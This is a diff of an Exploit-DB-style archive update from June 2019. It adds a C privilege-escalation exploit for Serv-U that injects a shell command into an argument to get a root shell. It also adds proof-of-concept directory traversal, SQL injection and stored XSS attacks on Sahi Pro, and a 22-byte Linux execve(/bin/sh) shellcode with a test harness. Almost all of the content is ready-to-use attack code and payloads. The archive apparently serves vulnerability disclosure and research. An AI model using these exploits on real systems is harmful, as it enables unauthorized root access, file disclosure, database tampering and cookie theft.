DB: 2019-06-19

5 changes to exploits/shellcodes

Serv-U FTP Server < 15.1.7 - Local Privilege Escalation
Sahi pro 7.x/8.x - Directory Traversal
Sahi pro 8.x - SQL Injection
Sahi pro 8.x - Cross-Site Scripting

Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)

exploits/linux/local/47009.c

@@ -0,0 +1,24 @@
+/*
+
+CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation 
+
+vulnerability found by:
+Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev
+
+to compile and run:
+gcc servu-pe-cve-2019-12181.c -o pe && ./pe
+
+*/
+
+#include <stdio.h>
+#include <unistd.h>
+#include <errno.h>
+
+int main()
+{       
+    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
+    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
+    // if execv is successful, we won't reach here
+    printf("ret val: %d errno: %d\n", ret_val, errno);
+    return errno;
+}

exploits/multiple/webapps/47005.txt

@@ -0,0 +1,22 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Directory traversal
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20470
+
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A directory traversal (arbitrary file access) vulnerability exists in the web reports module. This allows an outside attacker to view contents of sensitive files.
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+http://<ip>:<port>/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected

exploits/multiple/webapps/47006.txt

@@ -0,0 +1,25 @@
+# Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection.
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20469
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20469-sahi-pro/
+
+Description :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. A parameter in the web reports module is vulnerable to SQL injection. This can be exploited to inject SQL queries and run standard h2 system functions.
+
+
+POC :
+
+vulnerable URL :
+
+''' replace the ip and port of the remote sahi pro server machine '''
+
+
+# here sql query is passed directly as part of GET request which can be modified to run standard h2 database functions. in the following POC , "memory_used()" function is injected , which is reflected in "status" column of reports page.
+
+http://<ip>:<port>/_s_/dyn/pro/DBReports?sql=SELECT DISTINCT memory_used() AS ROWSTATUS, SCRIPTREPORTS.SCRIPTREPORTID,SCRIPTREPORTS.SCRIPTNAME,SUITEREPORTS.* FROM SUITEREPORTS,SCRIPTREPORTS

exploits/multiple/webapps/47007.txt

@@ -0,0 +1,32 @@
+# Exploit Title: Sahi pro ( <= 8.x ) Stored XSS
+# Date: 17-06-2019
+# Exploit Author: Goutham Madhwaraj ( https://barriersec.com )
+# Vendor Homepage: https://sahipro.com/
+# Software Link: https://sahipro.com/downloads-archive/
+# Version: 7.x , <= 8.x
+# Tested on: Windows 10
+# CVE : CVE-2018-20472
+# POC-URL : https://barriersec.com/2019/06/cve-2018-20472-sahi-pro/
+
+DESCRIPTION :
+
+An issue was discovered in Tyto Sahi Pro through 7.x.x and 8.0.0. The logs web interface is vulnerable to stored XSS. Description parameter of Testcase API can be used to exploit the stored XSS.
+
+
+POC :
+
+step 1 :
+
+ create a sahi test automation script with the following content and save the file with ".sah" extension ( example : poc.sah) :
+
+            var $tc1 = _testcase(“TC-1″,”<script>alert(document.cookie)</script>”).start();
+
+           _log(“testing stored XSS injection”);
+
+            $tc1.end();
+
+Step 2 :
+
+Execute the created script ( poc.sah ) using sahi GUI controller .
+
+Step 3 : navigate to the web logs console ( http://<ip>:<port>/logs ) using the browser for the executed script. XSS is triggered .

files_exploits.csv

@@ -10555,6 +10555,7 @@ id,file,description,date,author,type,platform,port
 46991,exploits/windows/local/46991.py,"Aida64 6.00.5100 - 'Log to CSV File' Local SEH Buffer Overflow",2019-06-14,"Nipun Jaswal",local,windows,
 46996,exploits/linux/local/46996.sh,"Exim 4.87 - 4.91 - Local Privilege Escalation",2019-06-17,"Marco Ivaldi",local,linux,
 46998,exploits/windows/local/46998.txt,"Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)",2019-06-17,Gushmazuko,local,windows,
+47009,exploits/linux/local/47009.c,"Serv-U FTP Server < 15.1.7 - Local Privilege Escalation",2019-06-18,"Guy Levin",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41408,3 +41409,6 @@ id,file,description,date,author,type,platform,port
 46992,exploits/multiple/webapps/46992.py,"RedwoodHQ 2.5.5 - Authentication Bypass",2019-06-17,EthicalHCOP,webapps,multiple,
 46993,exploits/hardware/webapps/46993.txt,"CleverDog Smart Camera DOG-2W / DOG-2W-V4 - Multiple Vulnerabilities",2019-06-17,"Alex Akinbi",webapps,hardware,
 47000,exploits/java/webapps/47000.txt,"Spring Security OAuth - Open Redirector",2019-06-17,Riemann,webapps,java,
+47005,exploits/multiple/webapps/47005.txt,"Sahi pro 7.x/8.x - Directory Traversal",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47006,exploits/multiple/webapps/47006.txt,"Sahi pro 8.x - SQL Injection",2019-06-18,"Goutham Madhwaraj",webapps,multiple,
+47007,exploits/multiple/webapps/47007.txt,"Sahi pro 8.x - Cross-Site Scripting",2019-06-18,"Goutham Madhwaraj",webapps,multiple,

files_shellcodes.csv

@@ -970,3 +970,4 @@ id,file,description,date,author,type,platform
 46975,shellcodes/linux_x86-64/46975.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2019-06-07,"Aron Mihaljevic",shellcode,linux_x86-64
 46979,shellcodes/linux_x86-64/46979.c,"Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (104 bytes)",2019-06-10,"Aron Mihaljevic",shellcode,linux_x86-64
 46994,shellcodes/linux_x86/46994.txt,"Linux/x86 - Reposition + INC encoder with execve(/bin/sh) Shellcode (66 bytes)",2019-06-17,"Jonathan So",shellcode,linux_x86
+47008,shellcodes/linux_x86-64/47008.c,"Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)",2019-06-18,"Aron Mihaljevic",shellcode,linux_x86-64

shellcodes/linux_x86-64/47008.c

@@ -0,0 +1,51 @@
+Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
+;Author: Aron Mihaljevic
+;Architecture: Linux x86_64
+;Shellcode Length:  22 bytes
+;github = https://github.com/STARRBOY	
+
+
+============ASM===========================
+global _start
+
+section .text
+
+_start:
+
+	
+	
+	;int execve(const char *filename, char *const argv[],char *const envp[])
+	xor 	rsi,	rsi			;clear rsi
+	push	rsi				;push null on the stack
+	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
+	push	rdi
+	push	rsp		
+	pop	rdi				;stack pointer to /bin//sh
+	mov 	al,	59			;sys_execve
+	cdq					;sign extend of eax
+	syscall
+
+=======Generate Shellcode==========================================
+nasm -felf64 spawn_shell.nasm -o spawn_shell.o 
+ld spawn_shell.o -o spawn_shell
+
+
+=========generate C program to exploit=============================
+gcc -fno-stack-protector -z execstack shell.c -o shell
+
+#include <stdio.h>
+#include <string.h>
+
+unsigned char code[]= \
+                  "\x48\x31\xf6\x56\x48\xbf"
+		  "\x2f\x62\x69\x6e\x2f"
+		  "\x2f\x73\x68\x57\x54"
+		  "\x5f\xb0\x3b\x99\x0f\x05";
+int main(){
+
+        printf("length of your shellcode is: %d\n", (int)strlen(code));
+
+        int (*ret)() = (int(*)())code;
+
+        ret();
+}